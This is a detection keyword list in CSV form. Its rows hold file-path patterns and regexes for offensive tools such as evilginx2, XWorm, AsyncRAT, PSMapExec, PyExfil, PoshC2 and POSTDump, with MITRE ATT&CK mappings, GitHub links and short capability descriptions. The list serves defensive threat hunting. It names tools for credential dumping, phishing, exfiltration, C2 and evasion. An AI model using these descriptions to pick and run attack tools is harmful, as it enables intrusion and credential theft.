"*\PEzor\loader.c*",".{0,1000}\\PEzor\\loader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\PhishCreds.ps1*",".{0,1000}\\PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\phishlets\example.yaml*",".{0,1000}\\phishlets\\example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*\PHVNC.exe*",".{0,1000}\\PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\PHVNC.pdb*",".{0,1000}\\PHVNC\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\PickleC2\Core\*.py*",".{0,1000}\\PickleC2\\Core\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\PILOT.ps1*",".{0,1000}\\PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*\PILOT\ATC.py*",".{0,1000}\\PILOT\\ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*\PingRAT\*",".{0,1000}\\PingRAT\\.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*\PingSweep.ps1*",".{0,1000}\\PingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\PInject.ps1*",".{0,1000}\\PInject\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\pipe\brutepipe*",".{0,1000}\\pipe\\brutepipe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\pipe\moj_ML_ntsvcs *",".{0,1000}\\pipe\\moj_ML_ntsvcs\s.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\PipeViewer.exe*",".{0,1000}\\PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\PipeViewer.sln*",".{0,1000}\\PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\PipeViewer\Program.cs*",".{0,1000}\\PipeViewer\\Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\pkg\merlin.go*",".{0,1000}\\pkg\\merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Plugins\HRDP.dll*",".{0,1000}\\Plugins\\HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\HVNC.dll*",".{0,1000}\\Plugins\\HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\PreventSleep.dll*",".{0,1000}\\Plugins\\PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\RemoteCamera.dll*",".{0,1000}\\Plugins\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\Plugins\RemoteDesktop.dll*",".{0,1000}\\Plugins\\RemoteDesktop\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\PME\*-ConsoleHistory.txt*",".{0,1000}\\PME\\.{0,1000}\-ConsoleHistory\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Console History\*",".{0,1000}\\PME\\Console\sHistory\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\eKeys\*",".{0,1000}\\PME\\eKeys\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\LogonPasswords*",".{0,1000}\\PME\\LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\LSA\*",".{0,1000}\\PME\\LSA\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\MSSQL\*",".{0,1000}\\PME\\MSSQL\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\SAM\*",".{0,1000}\\PME\\SAM\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Sessions\*",".{0,1000}\\PME\\Sessions\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\SMB\*",".{0,1000}\\PME\\SMB\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Spraying\*",".{0,1000}\\PME\\Spraying\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Tickets\Kerbdump*",".{0,1000}\\PME\\Tickets\\Kerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Tickets\MimiTickets*",".{0,1000}\\PME\\Tickets\\MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\User Files\*",".{0,1000}\\PME\\User\sFiles\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\VNC\*",".{0,1000}\\PME\\VNC\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PoC\PrivilegeEscalation*",".{0,1000}\\PoC\\PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*\POC_DLL.dll*",".{0,1000}POC_DLL\.dll.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\POC_DLL.vcxproj*",".{0,1000}\\POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\PoisonTendy\Invokes\*",".{0,1000}\\PoisonTendy\\Invokes\\.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\polenum.py*",".{0,1000}\\polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\PoolParty.cpp*",".{0,1000}\\PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.exe*",".{0,1000}\\PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.hpp*",".{0,1000}\\PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.sln*",".{0,1000}\\PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.vcxproj*",".{0,1000}\\PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty-PoolParty\*",".{0,1000}\\PoolParty\-PoolParty\\.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\pop_exfil_client.py*",".{0,1000}\\pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\pop_exfil_server.py*",".{0,1000}\\pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\port_reuse.py*",".{0,1000}\\port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\port_scan.py*",".{0,1000}\\port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\portbender.*",".{0,1000}\\portbender\..{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*\PoshC2*",".{0,1000}\\PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*\POSTDump.csproj*",".{0,1000}\\POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - 